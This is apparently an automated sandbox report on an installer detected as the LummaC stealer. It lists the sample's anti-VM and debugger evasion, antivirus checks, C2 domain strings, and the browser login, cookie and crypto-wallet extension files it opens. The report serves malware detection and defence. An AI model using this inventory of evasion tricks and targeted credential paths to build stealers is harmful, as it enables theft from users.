Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Exlan_setup_v3.1.2.exe PID: 7556, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Memory allocated: 16D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Memory allocated: 30D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe TID: 7604	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe TID: 7600	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.000000000149F000.00000004.00000020.00020000.00000000.sdmp, Exlan_setup_v3.1.2.exe, 00000001.00000002.1807378223.000000000144D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

API call chain: ExitProcess graph end node

graph_0-39975

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 1_2_0043BED0 LdrInitializeThunk,

1_2_0043BED0

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6D00948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_6D00948B

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6CFBB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CFBB6C0

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6D00948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6D00948B
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Code function: 0_2_6D00B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6D00B144

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1674099835.00000000036D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: justyffyr.click

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Process created: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe "C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6D0084B0 cpuid

0_2_6D0084B0

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Queries volume information: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Code function: 0_2_6D00A25A GetSystemTimeAsFileTime,__aulldiv,

0_2_6D00A25A

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807485559.0000000001463000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Exlan_setup_v3.1.2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Exlan_setup_v3.1.2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1690736705.0000000004273000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ts","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdaL
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash"5$<
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807847132.00000000014EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Exlan_setup_v3.1.2.exe, 00000001.00000002.1807664250.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: Exlan_setup_v3.1.2.exe, 00000000.00000002.1694157417.0000000005EC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
